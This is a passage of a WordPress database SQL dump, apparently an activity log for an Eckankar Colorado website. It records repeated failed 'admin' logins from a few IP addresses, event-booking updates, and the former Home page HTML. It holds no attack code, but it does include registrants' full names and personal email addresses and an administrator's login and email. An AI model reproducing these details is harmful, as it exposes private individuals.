Safari/537.36'),(220042,36455,'_message_key','user_unknown_login_failed'),(220043,36455,'_server_remote_addr','34.65.234.x'),(220044,36456,'failed_username','admin'),(220045,36456,'server_http_user_agent','Mozilla/5.0'),(220046,36456,'_message_key','user_unknown_login_failed'),(220047,36456,'_server_remote_addr','45.136.118.x'),(220048,36457,'failed_username','admin'),(220049,36457,'server_http_user_agent','Mozilla/5.0'),(220050,36457,'_message_key','user_unknown_login_failed'),(220051,36457,'_server_remote_addr','45.136.118.x'),(220052,36458,'failed_username','admin'),(220053,36458,'server_http_user_agent','Mozilla/5.0'),(220054,36458,'_message_key','user_unknown_login_failed'),(220055,36458,'_server_remote_addr','45.136.118.x'),(220056,36459,'failed_username','admin'),(220057,36459,'server_http_user_agent','Mozilla/5.0'),(220058,36459,'_message_key','user_unknown_login_failed'),(220059,36459,'_server_remote_addr','45.136.118.x'),(220060,36460,'failed_username','admin'),(220061,36460,'server_http_user_agent','Mozilla/5.0'),(220062,36460,'_message_key','user_unknown_login_failed'),(220063,36460,'_server_remote_addr','45.136.118.x'),(220064,36461,'failed_username','admin'),(220065,36461,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(220066,36461,'_message_key','user_unknown_login_failed'),(220067,36461,'_xmlrpc_request','true'),(220068,36461,'_server_remote_addr','20.150.208.x'),(220069,36462,'post_id','269175'),(220070,36462,'post_type','mec-books'),(220071,36462,'post_title','Bonnie Greenstreet  &#8211; bngstreet@gmail.com'),(220072,36462,'_message_key','post_updated'),(220073,36462,'_server_remote_addr','172.59.96.x'),(220074,36462,'_server_http_referer','https://eckankar-colorado.org/events/eck-light-and-sound-service-in-person-onlinetitle-goes-here-template-998/'),(220075,36463,'post_id','269175'),(220076,36463,'post_type','mec-books'),(220077,36463,'post_title','Bonnie Greenstreet  &#8211; bngstreet@gmail.com'),(220078,36463,'post_meta_added','3'),(220079,36463,'_message_key','post_updated'),(220080,36463,'_server_remote_addr','172.59.96.x'),(220081,36463,'_server_http_referer','https://eckankar-colorado.org/events/eck-light-and-sound-service-in-person-onlinetitle-goes-here-template-998/'),(220082,36464,'failed_username','admin'),(220083,36464,'server_http_user_agent','Mozilla/5.0'),(220084,36464,'_message_key','user_unknown_login_failed'),(220085,36464,'_server_remote_addr','45.136.118.x'),(220086,36465,'failed_username','admin'),(220087,36465,'server_http_user_agent','Mozilla/5.0'),(220088,36465,'_message_key','user_unknown_login_failed'),(220089,36465,'_server_remote_addr','45.136.118.x'),(220090,36466,'failed_username','admin'),(220091,36466,'server_http_user_agent','Mozilla/5.0'),(220092,36466,'_message_key','user_unknown_login_failed'),(220093,36466,'_server_remote_addr','45.136.118.x'),(220094,36467,'failed_username','wwwadmin'),(220095,36467,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36'),(220096,36467,'_message_key','user_unknown_login_failed'),(220097,36467,'_server_remote_addr','51.77.230.x'),(220098,36468,'failed_username','admin'),(220099,36468,'server_http_user_agent','Mozilla/5.0'),(220100,36468,'_message_key','user_unknown_login_failed'),(220101,36468,'_server_remote_addr','45.136.118.x'),(220102,36469,'failed_username','admin'),(220103,36469,'server_http_user_agent','Mozilla/5.0'),(220104,36469,'_message_key','user_unknown_login_failed'),(220105,36469,'_server_remote_addr','45.136.118.x'),(220106,36470,'failed_username','admin'),(220107,36470,'server_http_user_agent','Mozilla/5.0'),(220108,36470,'_message_key','user_unknown_login_failed'),(220109,36470,'_server_remote_addr','45.136.118.x'),(220110,36471,'failed_username','admin'),(220111,36471,'server_http_user_agent','Mozilla/5.0'),(220112,36471,'_message_key','user_unknown_login_failed'),(220113,36471,'_server_remote_addr','45.136.118.x'),(220114,36472,'failed_username','admin'),(220115,36472,'server_http_user_agent','Mozilla/5.0'),(220116,36472,'_message_key','user_unknown_login_failed'),(220117,36472,'_server_remote_addr','45.136.118.x'),(220118,36473,'failed_username','admin'),(220119,36473,'server_http_user_agent','Mozilla/5.0'),(220120,36473,'_message_key','user_unknown_login_failed'),(220121,36473,'_server_remote_addr','45.136.118.x'),(220122,36474,'failed_username','admin'),(220123,36474,'server_http_user_agent','Mozilla/5.0'),(220124,36474,'_message_key','user_unknown_login_failed'),(220125,36474,'_server_remote_addr','45.136.118.x'),(220126,36475,'failed_username','admin'),(220127,36475,'server_http_user_agent','Mozilla/5.0'),(220128,36475,'_message_key','user_unknown_login_failed'),(220129,36475,'_server_remote_addr','45.136.118.x'),(220130,36476,'post_id','269176'),(220131,36476,'post_type','mec-books'),(220132,36476,'post_title','Chukwuebuka Okwor &#8211; ocekenedili@yahoo.com'),(220133,36476,'_message_key','post_updated'),(220134,36476,'_server_remote_addr','138.67.174.x'),(220135,36476,'_server_http_referer','https://eckankar-colorado.org/events/eck-light-and-sound-service-in-person-onlinetitle-goes-here-template-998/?occurrence=2023-10-08'),(220136,36477,'post_id','269176'),(220137,36477,'post_type','mec-books'),(220138,36477,'post_title','Chukwuebuka Okwor &#8211; ocekenedili@yahoo.com'),(220139,36477,'post_meta_added','3'),(220140,36477,'_message_key','post_updated'),(220141,36477,'_server_remote_addr','138.67.174.x'),(220142,36477,'_server_http_referer','https://eckankar-colorado.org/events/eck-light-and-sound-service-in-person-onlinetitle-goes-here-template-998/?occurrence=2023-10-08'),(220143,36478,'failed_username','admin'),(220144,36478,'server_http_user_agent','Mozilla/5.0'),(220145,36478,'_message_key','user_unknown_login_failed'),(220146,36478,'_server_remote_addr','45.136.118.x'),(220147,36479,'failed_username','admin'),(220148,36479,'server_http_user_agent','Mozilla/5.0'),(220149,36479,'_message_key','user_unknown_login_failed'),(220150,36479,'_server_remote_addr','45.136.118.x'),(231587,39187,'_message_key','post_updated'),(231588,39187,'_user_id','2'),(231589,39187,'_user_login','S8zhaBda'),(231590,39187,'_user_email','nada@zipnadanot.org'),(231591,39187,'_server_remote_addr','76.130.120.x'),(231592,39187,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=7160&action=edit'),(231593,39188,'post_id','7160'),(231594,39188,'post_type','page'),(231595,39188,'post_title','Home'),(231596,39188,'post_prev_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 23px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"border-width: 0px; padding: 0em 1%;\">\r\n<div class=\"bg-video bg-video-1\" data-imhwpb-draggable=\"true\" style=\"border-width: 0px;\">\r\n<p>[embed height=\"315\" width=\"560\"]https://youtu.be/s78XVcM7HWI[/embed]</p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6 bg-alpha-491\" style=\"border-width: 0px; padding-bottom: 0em; margin-bottom: 5px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\'); background-size: cover; background-position: 50% 50%;\" data-alpha=\"0.38\" data-bg-uuid=\"bg-alpha-491\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\">\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; margin-top: 17px;\"><img class=\"alignright wp-image-268059 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-lg-2-1.png\" alt=\"\" width=\"317\" height=\"260\"></p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 38px; line-height: 28px; font-family: \'Raleway\'; font-weight: 500; margin-top: 24px; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Free</p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 37px; line-height: 31px; font-family: \'Raleway\'; font-weight: bold; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"700\" data-font-style=\"\">ECK Books</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; padding: 0%; margin-left: 6px; color: #615b5b; line-height: 22px; margin-top: 16px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">The free-book offer includes two titles:</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-weight: 600; font-size: 18px; margin-left: 6px; color: #615b5b; line-height: 23px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><em>ECKANKAR—Ancient Wisdom for Today</em> and <em>Is Life a Random Walk? <br>\r\n<br>\r\n</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\">\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"\">\r\n<h3 class=\"\"><img class=\"aligncenter wp-image-268029 size-full bg-img\" style=\"margin-top: -11px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/meetup-wide-2.png\" alt=\"\" width=\"564\" height=\"258\"></h3>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 18px; font-weight: 400; text-align: center; color: #333333;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">These Colorado discussion groups are open to everyone.<br>\r\nShare or listen to spiritual experiences and insights.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"font-size: 15px;\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"bg-box\">\r\n<h4 class=\"\"><img class=\"bg-img alignnone wp-image-268201 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/newsletter-lg-1.png\" alt=\"\" width=\"564\" height=\"91\"></h4>\r\n<h4 class=\"\" style=\"text-align: center; border-width: 0px; font-size: 27px; line-height: 46px; color: #f28a27; margin-top: 21px;\" data-font-weight=\"600\">Subscribe Today!</h4>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-size: 18px; color: #333333;\">Sign up to receive your local Public Newsletter!<br>\r\nGet all the latest news and events<br>\r\nfrom around the state.</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 16px;\"><strong>(Initiate Subscriptions are available in the</strong> <a class=\"\" href=\"https://demo2.cloudwp.dev/trial-78x6yt23/initiate-page/\">Initiate Area</a><strong>)</strong></p>\r\n<p style=\"text-align: center; margin-top: 25px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\">Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(231081,39102,'failed_username','admin'),(231082,39102,'server_http_user_agent','Mozilla/5.0'),(231083,39102,'_message_key','user_unknown_login_failed'),(231084,39102,'_server_remote_addr','20.169.51.x'),(231085,39103,'failed_username','admin'),(231086,39103,'server_http_user_agent','Mozilla/5.0'),(231087,39103,'_message_key','user_unknown_login_failed'),(231088,39103,'_server_remote_addr','45.136.118.x'),(231089,39104,'failed_username','admin'),(231090,39104,'server_http_user_agent','Mozilla/5.0'),(231091,39104,'_message_key','user_unknown_login_failed'),(231092,39104,'_server_remote_addr','20.169.51.x'),(231093,39105,'failed_username','dev-singsing'),(231094,39105,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(231095,39105,'_message_key','user_unknown_login_failed'),(231096,39105,'_xmlrpc_request','true'),(231097,39105,'_server_remote_addr','20.238.72.x'),(231098,39106,'failed_username','admin'),(231099,39106,'server_http_user_agent','Mozilla/5.0'),(231100,39106,'_message_key','user_unknown_login_failed'),(231101,39106,'_server_remote_addr','45.136.118.x'),(231102,39107,'failed_username','admin'),(231103,39107,'server_http_user_agent','Mozilla/5.0'),(231104,39107,'_message_key','user_unknown_login_failed'),(231105,39107,'_server_remote_addr','20.169.51.x'),(231106,39108,'failed_username','admin'),(231107,39108,'server_http_user_agent','Mozilla/5.0'),(231108,39108,'_message_key','user_unknown_login_failed'),(231109,39108,'_server_remote_addr','45.136.118.x'),(231110,39109,'failed_username','admin'),(231111,39109,'server_http_user_agent','Mozilla/5.0'),(231112,39109,'_message_key','user_unknown_login_failed'),(231113,39109,'_server_remote_addr','20.169.51.x'),(231114,39110,'failed_username','admin'),(231115,39110,'server_http_user_agent','Mozilla/5.0'),(231116,39110,'_message_key','user_unknown_login_failed'),(231117,39110,'_server_remote_addr','45.136.118.x'),(231118,39111,'failed_username','admin'),(231119,39111,'server_http_user_agent','Mozilla/5.0'),(231120,39111,'_message_key','user_unknown_login_failed'),(231121,39111,'_server_remote_addr','20.169.51.x'),(231122,39112,'failed_username','admin'),(231123,39112,'server_http_user_agent','Mozilla/5.0'),(231124,39112,'_message_key','user_unknown_login_failed'),(231125,39112,'_server_remote_addr','45.136.118.x'),(231126,39113,'failed_username','admin'),(231127,39113,'server_http_user_agent','Mozilla/5.0'),(231128,39113,'_message_key','user_unknown_login_failed'),(231129,39113,'_server_remote_addr','20.169.51.x'),(231130,39114,'failed_username','admin'),(231131,39114,'server_http_user_agent','Mozilla/5.0'),(231132,39114,'_message_key','user_unknown_login_failed'),(231133,39114,'_server_remote_addr','45.136.118.x'),(231134,39115,'failed_username','admin'),(231135,39115,'server_http_user_agent','Mozilla/5.0'),(231136,39115,'_message_key','user_unknown_login_failed'),(231137,39115,'_server_remote_addr','20.169.51.x'),(231138,39116,'failed_username','admin'),(231139,39116,'server_http_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'),(231140,39116,'_message_key','user_unknown_login_failed'),(231141,39116,'_server_remote_addr','104.244.72.x'),(231142,39117,'failed_username','admin'),(231143,39117,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 